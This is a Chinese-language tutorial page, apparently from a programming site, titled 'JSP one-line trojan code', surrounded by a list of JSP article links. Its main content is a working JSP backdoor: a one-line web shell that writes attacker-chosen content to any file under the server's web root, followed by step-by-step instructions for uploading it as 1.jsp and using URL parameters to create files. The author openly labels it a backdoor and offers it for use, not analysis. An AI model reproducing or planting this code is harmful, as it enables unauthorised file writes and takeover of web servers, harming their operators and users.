当前位置: 首页 > 图文教程 > 网络编程 > JSP > JSP一句话木马代码

JSP
Allair JRUN 非法读取 WEB-INF 漏洞
Allaire JRUN 2.3 查看任意文件漏洞
apache tomcat的snoop servlet漏洞
JDBC接口技术
j2ee的jdbc配置指南--连接sql server 数据库
j2ee doc 之 配置指南
在Servlet中使用请求头(Request Header)
处理表单提交的数据
MyFirstServlet
CNET JSP BASIC:建立一个JSP网站
CNET JSP BASIC:JSP的内部对象
CNET JSP BASIC:JSP与JavaBean
CNET JSP BASIC:JSP语法的基本原理
CNET JSP BASIC: 安装JSP
Java和ASP的交互(二)
Java和ASP的交互(一)
调用 Servlet
创建HTTP Servlet
Servlet 是什么?
用JSP构建动态网站

JSP一句话木马代码


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-09-13   浏览: 117 ::
收藏到网摘: n/a

复制代码 代码如下:

<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>

这个 后门估计不用我说了吧.还是提示一下咯.保存为1.jsp 提交url!
http://localhost/1.jsp?f=1.txt&t=hello
然后:http://localhost/1.txt 就出来了 内容为 hello .....